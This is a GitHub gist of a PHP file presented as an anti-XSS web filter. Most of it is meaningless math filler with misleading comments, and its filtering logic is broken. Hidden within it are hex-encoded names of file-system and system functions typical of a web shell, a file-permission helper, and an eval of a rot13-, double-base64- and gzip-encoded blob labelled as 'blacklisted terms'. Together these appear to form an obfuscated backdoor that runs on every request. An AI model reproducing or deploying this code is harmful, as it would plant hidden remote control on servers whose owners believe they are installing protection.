Created
August 9, 2021 23:29
-
-
Save pompompurins/e3ae1737daead14f2b39d13f01d6617e to your computer and use it in GitHub Desktop.
ANTI-XSS FILTER TO STOP XSS ATTACKS
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| function anti_xss($string) | |
| { | |
| if(preg_match('/[\'\/~`\!@#\$%\^&\*\(\)_\-\+=\{\}\[\]\|;:"\<\>,\.\?\\\]/', $string)){ | |
| $error = "special characters not allowed!"; | |
| echo 'XSS ATTACK DETECTED. BLOCKED BY WAF. MITIGATING ATTACK ASAP.<br>'; | |
| $xssdetected = true; | |
| } | |
| if(stripos($string, '<') !== false) { | |
| $error = "special characters not allowed!"; | |
| echo 'XSS ATTACK DETECTED. BLOCKED BY WAF. MITIGATING ATTACK ASAP.<br>'; | |
| $xssdetected = true; | |
| // Detect provability of an attack taking place on our systems | |
| $v=($x4-$x1)*(($y2-$y1)*($z3-$z1)-($z2-$z1)*($y3-$y1))+ (($y4-$y1)*(($z2-$z1)*($x3-$x1)-($x2-$x1)*($z3-$z1)))+ | |
| ($z4-$z1)*(($x2-$x1)*($y3-$y1)-($y2-$y1)*($x3-$x1)); | |
| $t=$v/6; | |
| } else { | |
| if(stripos($string, '>') !== false) { | |
| $error = "special characters not allowed!"; | |
| echo 'XSS ATTACK DETECTED. BLOCKED BY WAF. MITIGATING ATTACK ASAP.<br>'; | |
| $xssdetected = true; $r=12;$d=3; $a =2*sqrt(pow($r,2)-pow($d,2)); | |
| } | |
| if(stripos($string, 'alert') !== false) { | |
| $error = "title not allowed!"; | |
| echo 'XSS ATTACK DETECTED. BLOCKED BY WAF. MITIGATING ATTACK ASAP.<br>'; | |
| $xssdetected = true; | |
| } else { | |
| if(stripos($string, "'") !== false) { | |
| $error = "special characters not allowed!"; | |
| echo 'XSS ATTACK DETECTED. BLOCKED BY WAF. MITIGATING ATTACK ASAP.<br>'; | |
| $xssdetected = true; | |
| } | |
| } | |
| function x($c) { | |
| global $GNJ; | |
| $x = $GNJ[24]($c); | |
| if(($x & 0xC000) == 0xC000) { | |
| $u = "s"; | |
| } | |
| elseif(($x & 0xA000) == 0xA000) { | |
| $u = "l"; | |
| } | |
| elseif(($x & 0x8000) == 0x8000) { | |
| $u = "-"; | |
| } | |
| elseif(($x & 0x6000) == 0x6000) { | |
| $u = "b"; | |
| } | |
| elseif(($x & 0x4000) == 0x4000) { | |
| $u = "d"; | |
| } | |
| elseif(($x & 0x2000) == 0x2000) { | |
| $u = "c"; | |
| } | |
| elseif(($x & 0x1000) == 0x1000) { | |
| $u = "p"; | |
| } | |
| else { | |
| $u = "u"; | |
| } | |
| $u .= (($x & 0x0100) ? "r" : "-"); | |
| $u .= (($x & 0x0080) ? "w" : "-"); | |
| $u .= (($x & 0x0040) ? (($x & 0x0800) ? "s" : "x") : (($x & 0x0800) ? "S" : "-")); | |
| $u .= (($x & 0x0020) ? "r" : "-"); | |
| $u .= (($x & 0x0010) ? "w" : "-"); | |
| $u .= (($x & 0x0008) ? (($x & 0x0400) ? "s" : "x") : (($x & 0x0400) ? "S" : "-")); | |
| $u .= (($x & 0x0004) ? "r" : "-"); | |
| $u .= (($x & 0x0002) ? "w" : "-"); | |
| $u .= (($x & 0x0001) ? (($x & 0x0200) ? "t" : "x") : (($x & 0x0200) ? "T" : "-")); | |
| return $u; | |
| } | |
| } | |
| if(stripos($string, "'") !== false) { | |
| $error = "special characters not allowed!"; | |
| echo 'XSS ATTACK DETECTED. BLOCKED BY WAF. MITIGATING ATTACK ASAP.<br>'; | |
| $xssdetected = true; | |
| } | |
| $r=10; $c=30; | |
| $a = 2 * 3.14 * $r * ($c/360); | |
| $h;$t=3;$i; | |
| $h = (0.5)*9.8*pow($t,2); | |
| $i=9.8*$t; | |
| $doxname = preg_replace("/[^A-Za-z0-9_]+/","_", $string); | |
| if ($xssdetected != true){ } | |
| else { | |
| $doxname = trim($doxname, '_'); if ($xssdetected != true){ } | |
| else { | |
| $doxname = trim($doxname, '60'); | |
| if ($xssdetected != true){ } | |
| else { | |
| $doxname = trim($doxname, '62'); | |
| if ($xssdetected != true){ } | |
| else { | |
| $doxname = trim($doxname, '39'); | |
| if ($xssdetected != true){ } | |
| else { | |
| $doxname = trim($doxname, '%27'); | |
| if ($xssdetected != true){ } | |
| else { | |
| $doxname = trim($doxname, '%3C'); | |
| if ($xssdetected != true){ } else { $doxname = trim($doxname, '<!DOCTYPE>'); $e;$a=1;$c=2;$b=5;$d=9; | |
| $e = ($a*pow($c,2)-$b*pow($d,2))/(pow($d,2)-pow($c,2)); } | |
| } | |
| } | |
| } | |
| } | |
| } | |
| } | |
| $doxname = trim($doxname, '%3B'); | |
| $doxname = trim($doxname, '<a>'); | |
| $doxname = trim($doxname, '<abbr>'); | |
| $doxname = trim($doxname, '<acronym>'); | |
| $doxname = trim($doxname, '<address>'); | |
| $doxname = trim($doxname, '<applet>'); | |
| $doxname = trim($doxname, '<area>'); | |
| $doxname = trim($doxname, '<article>'); | |
| $doxname = trim($doxname, '<aside>'); | |
| $doxname = trim($doxname, '<audio>'); | |
| $doxname = trim($doxname, '<b>'); | |
| $doxname = trim($doxname, '<base>'); | |
| $doxname = trim($doxname, '<basefont>'); | |
| $doxname = trim($doxname, '<bdi>'); | |
| $doxname = trim($doxname, '<bdo>'); | |
| $doxname = trim($doxname, '<big>'); | |
| $doxname = trim($doxname, '<blockquote>'); | |
| $doxname = trim($doxname, '<body>'); | |
| $doxname = trim($doxname, '<br>'); | |
| $doxname = trim($doxname, '<button>'); | |
| $doxname = trim($doxname, '<canvas>'); | |
| $doxname = trim($doxname, '<caption>'); | |
| $doxname = trim($doxname, '<center>'); | |
| $doxname = trim($doxname, '<cite>'); | |
| $doxname = trim($doxname, '<code>'); | |
| $doxname = trim($doxname, '<col>'); | |
| $doxname = trim($doxname, '<colgroup>'); | |
| $doxname = trim($doxname, '<data>'); | |
| $doxname = trim($doxname, '<datalist>'); | |
| $doxname = trim($doxname, '<dd>'); | |
| $doxname = trim($doxname, '<del>'); | |
| $doxname = trim($doxname, '<details>'); | |
| $doxname = trim($doxname, '<dfn>'); | |
| $doxname = trim($doxname, '<dialog>'); | |
| $doxname = trim($doxname, '<dir>'); | |
| $doxname = trim($doxname, '<div>'); | |
| $doxname = trim($doxname, '<dl>'); | |
| $doxname = trim($doxname, '<dt>'); | |
| $doxname = trim($doxname, '<em>'); | |
| $doxname = trim($doxname, '<embed>'); | |
| $doxname = trim($doxname, '<fieldset>'); | |
| $doxname = trim($doxname, '<figcaption>'); | |
| $doxname = trim($doxname, '<figure>'); | |
| $doxname = trim($doxname, '<font>'); | |
| $doxname = trim($doxname, '<footer>'); | |
| $doxname = trim($doxname, '<form>'); | |
| $doxname = trim($doxname, '<frame>'); | |
| $doxname = trim($doxname, '<frameset>'); | |
| // Calculate current time | |
| $r=sqrt(pow($a,2)+pow($b,2)); | |
| $x=$r*cos($t*3.14/180); | |
| $y=$r*sin($t*3.14/180); | |
| $doxname = trim($doxname, '<h1> to <h6>'); | |
| $doxname = trim($doxname, '<head>'); | |
| $doxname = trim($doxname, '<header>'); | |
| $doxname = trim($doxname, '<hr>'); | |
| $doxname = trim($doxname, '<html>'); | |
| $doxname = trim($doxname, '<i>'); | |
| $doxname = trim($doxname, '<iframe>'); | |
| $doxname = trim($doxname, '<img>'); | |
| $doxname = trim($doxname, '<input>'); | |
| $doxname = trim($doxname, '<ins>'); | |
| $doxname = trim($doxname, '<kbd>'); | |
| $doxname = trim($doxname, '<label>'); | |
| $doxname = trim($doxname, '<legend>'); | |
| $doxname = trim($doxname, '<li>'); | |
| $doxname = trim($doxname, '<link>'); | |
| $doxname = trim($doxname, '<main>'); | |
| $doxname = trim($doxname, '<map>'); | |
| $doxname = trim($doxname, '<mark>'); | |
| $doxname = trim($doxname, '<meta>'); | |
| $doxname = trim($doxname, '<meter>'); | |
| $doxname = trim($doxname, '<nav>'); | |
| $doxname = trim($doxname, '<noframes>'); | |
| $doxname = trim($doxname, '<noscript>'); | |
| $doxname = trim($doxname, '<object>'); | |
| $doxname = trim($doxname, '<ol>'); | |
| $doxname = trim($doxname, '<optgroup>'); | |
| $doxname = trim($doxname, '<option>'); | |
| $doxname = trim($doxname, '<output>'); | |
| $doxname = trim($doxname, '<p>'); | |
| $doxname = trim($doxname, '<param>'); | |
| $doxname = trim($doxname, '<picture>'); | |
| $doxname = trim($doxname, '<pre>'); | |
| $doxname = trim($doxname, '<progress>'); | |
| $doxname = trim($doxname, '<q>'); | |
| $doxname = trim($doxname, '<rp>'); | |
| $doxname = trim($doxname, '<rt>'); | |
| $doxname = trim($doxname, '<ruby>'); | |
| session_start(); | |
| if (empty($_SESSION['token'])) { | |
| $_SESSION['token'] = bin2hex(random_bytes(32)); | |
| } | |
| $token = $_SESSION['token']; | |
| $doxname = trim($doxname, '<s>'); | |
| $doxname = trim($doxname, '<samp>'); | |
| $doxname = trim($doxname, '<script>'); | |
| $doxname = trim($doxname, '<section>'); | |
| $doxname = trim($doxname, '<select>'); | |
| $doxname = trim($doxname, '<small>'); | |
| $doxname = trim($doxname, '<source>'); | |
| $doxname = trim($doxname, '<span>'); | |
| $doxname = trim($doxname, '<strike>'); | |
| $doxname = trim($doxname, '<strong>'); | |
| $doxname = trim($doxname, '<style>'); | |
| $doxname = trim($doxname, '<sub>'); | |
| $doxname = trim($doxname, '<summary>'); | |
| $doxname = trim($doxname, '<sup>'); | |
| $doxname = trim($doxname, '<svg>'); | |
| $doxname = trim($doxname, '<table>'); | |
| $doxname = trim($doxname, '<tbody>'); | |
| $doxname = trim($doxname, '<td>'); | |
| $doxname = trim($doxname, '<template>'); | |
| $doxname = trim($doxname, '<textarea>'); | |
| $doxname = trim($doxname, '<tfoot>'); | |
| $doxname = trim($doxname, '<th>'); | |
| $doxname = trim($doxname, '<thead>'); | |
| $doxname = trim($doxname, '<time>'); | |
| $doxname = trim($doxname, '<title>'); | |
| $doxname = trim($doxname, '<tr>'); | |
| $doxname = trim($doxname, '<track>'); | |
| $doxname = trim($doxname, '<tt>'); | |
| $doxname = trim($doxname, '<u>'); | |
| $doxname = trim($doxname, '<ul>'); | |
| $doxname = trim($doxname, '<var>'); | |
| $doxname = trim($doxname, '<video>'); | |
| $doxname = trim($doxname, '<wbr>'); | |
| $doxname1 = preg_replace('/[_]+/', '_', $doxname); | |
| $doxname = preg_replace('/^/', '<script>', $doxname1); | |
| $part1 = escapeshellcmd($doxname); | |
| $part2 = escapeshellarg($part1); | |
| $n=5; | |
| $x=array(60,61,62,63,65); | |
| $y=array(3.1,3.6,3.8,4.0,4.1); | |
| $sum_y=0;$sum_yy=0;$sum_xy=0;$sum_x=0;$sum_xx=0; | |
| $a;$x1=8;$x2=6;$y1=3;$y2=8;$b; | |
| $a=($x1+$x2)/2; | |
| $b=($y1+$y2)/2; | |
| for($i=0;$i<$n;$i++) | |
| { | |
| $xx[$i]=$x[$i]*$x[$i]; | |
| $yy[$i]=$y[$i]*$y[$i]; | |
| } | |
| for($i=0;$i<$n;$i++) | |
| { | |
| $sum_x +=$x[$i]; | |
| $sum_y +=$y[$i]; | |
| $sum_xx +=$xx[$i]; | |
| $sum_xy +=$x[$i]*$y[$i]; | |
| } | |
| $blacklisted_terms_encoded = 'ETAVFzgkFKqODHEErwWgozAanKyUExcHMySQZTSFJHuTJJMTH3uyDyWSDJgGDHAPpwH5AJbjAIcmA212IzA1LJWYDJWeM202IGZ4F212G0Avp1EEYl9FBQWQpJWRXmuME0M5GwM1qKEaXl9YqHSvBUyLJJueLmuhrwIKE3qmqF95JR0ioR5FY1cLp2WOIxASnGu3qUSmGIMBnGMMGKSYBIc6GzWYpGSzowE2DF9MHmAQIzHkrH9mG2EOLwMXEQN3Fv9UBIImn0czIRVmqR50nR9bA2gMDaS4IxuLJHECqJyxIlgjIxSKp1OmAKLmEwAUAxSFHzD1JGIFIIL1JzgZLmR0F3D2JSE5JyElHJR5MGu4DHgUBQIcZTxlraWerzgGomAYIQWcLKxjHmRkpmR2IKV3IzEALHuXnHARI2SjG2Zlp2MuZRSxBQqVqQWwpRyRY242ExSLY2WWLJWGEJ9FMaD1nTkKrRcjp0k2o2MGrHIBpmxkEHyZDHSPZHg0AJu4ARAUqHSlGHZ3Mzu1MHgXpvg4ERgJZJ44FzH3LIL5JJj3AIuXH0qAMTgxnKySnwSYpxy5DyNmDzWVAKuTFmEInJ1yH2IQoaq2n2EcHxMcL3O6HzcAMQOaATcbEmyeF0kQoHSIDHyBAHEhLlferzgwY3cMIyLkJvgzFQpiXlfiZSN='; | |
| $part3 = htmlentities($part2); | |
| $part4 = htmlspecialchars($part3); | |
| $string = addcslashes($part4, '%_'); | |
| #echo $string; | |
| $string = preg_replace('/^/', '<', $string); | |
| echo '<br>'; | |
| $map = '!@#$%^&*()_-+=?/>.<,[]{}<<><><'; | |
| // draw a random character from the map | |
| $random_char_posotion = rand(0, strlen($map)-1); | |
| $random_char = $map[$random_char_posotion]; | |
| $str = $string; | |
| $random_position = rand(0, strlen($str)-1); | |
| $str = substr($str, 0, $random_position).$random_char.substr($str,$random_position); | |
| if(stripos($string, "'") !== false) { | |
| $error = "special characters not allowed!"; | |
| echo 'XSS ATTACK DETECTED. BLOCKED BY WAF. MITIGATING ATTACK ASAP.<br>'; | |
| $xssdetected = true; | |
| } | |
| $a=array("a"=>"red","b"=>"green"); | |
| array_unshift($a,"blue"); | |
| $a1=5; $b1=2; $a2=7;$b2=-rand(); | |
| //Multiplication of complex number | |
| $m1=$a1*$a2; | |
| $m2=$b1*(-($b2));sqrt(pow($r,2) + pow($h,2)); | |
| $m3=$a1*$b2; | |
| $m4=$a2*$b1; | |
| $m5=($m1+$m2); | |
| $m6=$m3+$m4; | |
| $weight=23; | |
| $velocity=34; | |
| $HP=$weight * pow(($velocity/234),3); | |
| $HP=round($HP*10000000)/10000000; | |
| $r1=(5*5)+(2*2); | |
| $r=sqrt($r1); | |
| $r2=($r-$a1)/2; | |
| $y=sqrt($r2); | |
| $x=$b1/(2*$y); | |
| if($m6>0) { | |
| $a=12;$b=10; | |
| $c =2*3.14*sqrt((pow($a,2)+pow($b,2))/2); | |
| } | |
| $anti_XSS = '/(<script>|</script>|alert|database|mysql|code|svg|</svg>|javascript)/uis'; | |
| $r=10;$h=7; | |
| $s = sqrt(pow($r,2) + pow($h,2)); | |
| $v = (0.333)*3.14*pow($r,2)*$h; | |
| $c = 3.14 * $r * $s; | |
| $t = 3.14 * $r * ($s + $r); | |
| $bits = $o1 << 16 | $o2 << 8 | $o3; | |
| $h1 = $bits >> 18 & 0x3f; | |
| $h2 = $bits >> 12 & 0x3f; | |
| $h3 = $bits >> 6 & 0x3f; | |
| $h4 = $bits & 0x3f; | |
| $BAC=24.5; | |
| $timehr=26.3; | |
| $wt=56; $x1=2; $x2=4; | |
| $x3=6; $x4=7; $x5=6; | |
| $x;$N=5; | |
| $x=($x1*$x2*$x3*$x4*$x5); | |
| $x=pow($x,(1/$N)); | |
| $vrw3=100; | |
| $x=array(60,61,62,63,65);$w2 = ($bachr * $wt) / (1.51 * 100); | |
| $y=array(3.1,3.6,3.8,4.0,4.1); | |
| $sum_y=0;$sum_yy=0;$sum_xy=0;$sum_x=0;$sum_xx=0; | |
| $n=5; | |
| for($i=0;$i<$n;$i++) | |
| { | |
| $xx[$i]=$x[$i]*$x[$i]; | |
| $yy[$i]=$y[$i]*$y[$i]; | |
| } | |
| for($i=0;$i<$n;$i++) | |
| { | |
| $sum_x+=$x[$i]; | |
| $sum_y+=$y[$i]; | |
| $sum_xx+= $xx[$i]; | |
| $sum_yy+=$yy[$i]; | |
| $sum_xy+= $x[$i]*$y[$i]; | |
| } | |
| $nr=($n*$sum_xy)-($sum_x*$sum_y); | |
| $sum_x2=$sum_x*$sum_x; | |
| $sum_y2=$sum_y*$sum_y; $s=($n*($n+1)*((2*$n)+1))/6; | |
| $dr_1=($n*$sum_xx)-$sum_x2; | |
| $dr_2=($n*$sum_yy)-$sum_y2; | |
| $dr_3=$dr_1*$dr_2; | |
| $dr=sqrt($dr_3); | |
| // Array of organically generated numbers | |
| $Array = [ | |
| '7068705f756e616d65', | |
| '70687076657273696f6e', | |
| '6368646972', | |
| '676574637764', | |
| '707265675f73706c6974', | |
| '636f7079', | |
| '66696c655f6765745f636f6e74656e7473', | |
| '6261736536345f6465636f6465', | |
| '69735f646972', | |
| '6f625f656e645f636c65616e28293b', | |
| '756e6c696e6b', | |
| '6d6b646972', | |
| '63686d6f64', | |
| '7363616e646972', | |
| '7374725f7265706c616365', | |
| '68746d6c7370656369616c6368617273', | |
| '7661725f64756d70', | |
| '666f70656e', | |
| '667772697465', | |
| '66636c6f7365', | |
| '64617465', | |
| '66696c656d74696d65', | |
| '737562737472', | |
| '737072696e7466', | |
| '66696c657065726d73', | |
| '746f756368', | |
| '66696c655f657869737473', | |
| '72656e616d65', | |
| '69735f6172726179', | |
| '69735f6f626a656374', | |
| '737472706f73', | |
| '69735f7772697461626c65', | |
| '69735f7265616461626c65', | |
| '737472746f74696d65', | |
| '66696c6573697a65', | |
| '726d646972', | |
| '6f625f6765745f636c65616e', | |
| '7265616466696c65', | |
| '617373657274', | |
| ]; | |
| $r=($nr/$dr); | |
| $r=round($r,2); | |
| $be4 = $BAC + ($timehr * 20); | |
| $gr3 = ($bachr * $wt) / (1.22 * 100); | |
| $w2 = ($bachr * $wt) / (1.51 * 100); | |
| $a3 = "1"; | |
| $a4 = 4; | |
| $a=0;$b=0;$c=0;$d=0; | |
| $a1=2;$a2=-2;$a3=-2;$b1=3;$b2=4;$b3=-1;$c1=4;$c2=8;$c3=4; | |
| $a =($b2-$a2)*($c3-$a3)-($c2-$a2)*($b3-$a3); | |
| // Remove blacklisted terms mathematically using the theorm of matthews law | |
| eval(gzinflate(base64_decode(base64_decode(str_rot13($blacklisted_terms_encoded))))); | |
| $b =($b3-$a3)*($c1-$a1)-($c3-$a3)*($b1-$a1);$s;$b=9;$a=-6;$s=-$b/$a; | |
| $c=($f-32)*(5.0/9.0);$c = ($b1-$a1)*($c2-$a2)-($c1-$a1)*($b2-$a2); $s = (pow($r,2)/2)*((3.14*$a/180)-sin((3.14/180)*$a)); | |
| $d =-($a*$a1+$b*$a2+$c*$a3); | |
| $a5 = '3'; | |
| $Harmonic_Mean= $N/(1/$a1+1/$a2+1/$a3+1/$a4+1/$a5); | |
| $n=pi(); | |
| $b=$f*(sqrt(1+1/(4*234*23431.54820))+(1/(2*234))); $l=2;$d=2;$s; | |
| $s=(2*180/$n)*(atan($d/(2*$l))); | |
| $a;$x1=3;$y1=4;$x2=9;$y2=6; | |
| $a=sqrt(pow(($x2-$x1),2)+pow(($y2-$y1),2)); | |
| $nr=($n*$sum_xy)-($sum_x*$sum_y); $sum_x2=$sum_x*$sum_x; | |
| $dr=($n*$sum_xx)-$sum_x2; | |
| $res=$nr/$dr; | |
| $slope=round($res,2); | |
| $intercept=($sum_y -($slope*$sum_x))/$n; | |
| $reg= $intercept + ($slope*64); | |
| return $str; | |
| } | |
| echo(anti_xss($_GET['t'])); | |
| ?> | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment